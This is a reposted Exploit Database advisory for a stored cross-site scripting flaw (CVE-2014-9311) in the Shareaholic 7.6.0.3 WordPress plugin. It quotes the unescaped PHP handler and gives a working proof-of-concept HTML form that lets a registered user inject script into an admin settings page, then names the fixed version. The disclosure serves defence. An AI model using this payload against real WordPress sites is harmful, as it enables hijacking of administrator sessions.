WordPress Plugin Shareaholic 7.6.0.3 – Cross-Site Scripting

• Exploit Database
• 147 阅读

• 作者： Kacper Szurek
  日期： 2015-04-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36674/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

  # Exploit Title: Shareaholic 7.6.0.3 XSS # Date: 10-11-2014 # Software Link: https://wordpress.org/plugins/shareaholic/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-9311 # Category: webapps   1. Description   ShareaholicAdmin::add_location is accessible for every registered user.   File: shareaholic\shareaholic.php   add_action(&apos;wp_ajax_shareaholic_add_location&apos;,array(&apos;ShareaholicAdmin&apos;, &apos;add_location&apos;));     $_POST[&apos;location&apos;] is not escaped.   File: shareaholic\admin.php   public static function add_location() { $location = $_POST[&apos;location&apos;]; $app_name = $location[&apos;app_name&apos;]; ShareaholicUtilities::update_options(array( &apos;location_name_ids&apos; => array( $app_name => array( $location[&apos;name&apos;] => $location[&apos;id&apos;] ), ), $app_name => array( $location[&apos;name&apos;] => &apos;on&apos; ) ));   echo json_encode(array( &apos;status&apos; => "successfully created a new {$location[&apos;app_name&apos;]} location", &apos;id&apos; => $location[&apos;id&apos;] ));   die(); }   http://security.szurek.pl/shareaholic-7603-xss.html   2. Proof of Concept   Login as regular user (created using wp-login.php?action=register) then:   <form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="shareaholic_add_location"> <input type="hidden" name="location[app_name]" value="recommendations"> <input type="hidden" name="location[name]" value="post_below_content"> XSS: <input type="text" name="location[id]" value="&apos;><script>alert(String.fromCharCode(88,83,83));</script>"> <input type="submit" value="Hack!"> </form>   XSS will be visible for admin:   http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings   3. Solution:   Update to version 7.6.1.0 https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/